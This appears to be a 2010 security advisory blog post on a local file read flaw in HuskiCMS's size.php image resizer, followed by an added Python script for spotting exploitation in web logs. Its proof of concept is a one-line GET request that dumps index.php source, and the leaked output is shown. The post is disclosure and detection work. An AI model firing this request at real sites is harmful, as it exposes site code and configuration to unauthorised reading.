Just Another Hacker

HuskiCMS local file read

HuskiCMS: "huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS" [Taken from: http://www.huskicms.com]

Vulnerability description

A conditional file read vulnerability exists in the i parameter of the image resizing script size.php. The parameter is not filtered, which allows arbitrary files to be read.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: ASCET Interactive - http://www.ascetinteractive.com
  • Affected versions: Unknown

Proof of Concept

~$ GET 'http://[target]/size.php?i=index.php'
            <?php
                header ('Content-Type: text/html; charset=utf-8');
                // Data Includes
                include_once "PHPLib/db_mysql.inc";
                include_once "Data/dbConnection.class.php";
                include_once "Data/dbConfig.class.php";
                include_once "Data/dataAdapter.class.php";
                include_once "Quicksite/Core/domxml.class.php";
            
            
                // Quicksite Core Includes
                include_once "Quicksite/Core/all.inc.php";
                
                // Configuration
                include_once "Quicksite/db.config.php";
                include_once "inc/vars.config.php";
            
                // Initialise the Site
                $site = new Site($_VARS['site']);
                print_r($_SESSION['login']);
                // Initialise the Page
                $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));
            
                // Load plugin sources
                $page->loadPluginSources();
                
                // Create the Page
                $page->createPage();
                
                echo $page->Result;
            ?>

Solution

Upgrade to a more recent version
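
To check whether the flaw was used against a site before it was upgraded, the web server access log can be searched for size.php requests whose i value is not a plain image name. The script below is an added example, not part of the original advisory or of HuskiCMS; the combined log format, the extension allowlist and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: only these extensions are legitimate input to the resizer.
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")
# Start of an Apache/nginx "combined" log line (assumed log format).
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Feb/2010:10:00:01 +0000] "GET /size.php?i=images/logo.png HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [05/Feb/2010:10:02:13 +0000] "GET /size.php?i=index.php HTTP/1.1" 200 1043 "-" "-"',
    '198.51.100.7 - - [05/Feb/2010:10:02:40 +0000] "GET /size.php?i=%2e%2e%2fnotes.txt HTTP/1.1" 404 210 "-" "-"',
]

def fully_decode(value, rounds=3):
    """Percent-decode a bounded number of times so double-encoded values are seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(value):
    """Return the reasons an `i` value is not a plain image name ([] means fine)."""
    v = fully_decode(value)
    reasons = []
    if "\x00" in v:
        reasons.append("null-byte")
    if ".." in v.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if v.startswith(("/", "\\")) or "://" in v:
        reasons.append("absolute-or-url")
    if not v.split("\x00", 1)[0].lower().endswith(IMAGE_EXTS):
        reasons.append("non-image-extension")
    return reasons

def suspicious_size_requests(lines):
    """Yield-style list of (client, status, decoded i value, reasons) for size.php hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or not url.path.lower().endswith("/size.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("i", []):
            reasons = classify(value)
            if reasons:
                hits.append((m["host"], m["status"], fully_decode(value), reasons))
    return hits
```

A hit with status 200 is the one to investigate first, since the response body would have contained the requested file.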

Disclosure timeline

  • 05-Feb-2010 - Public disclosure
  • 29-Jan-2010 - Vendor acknowledged vulnerability
  • 28-Jan-2010 - Vendor notified through email
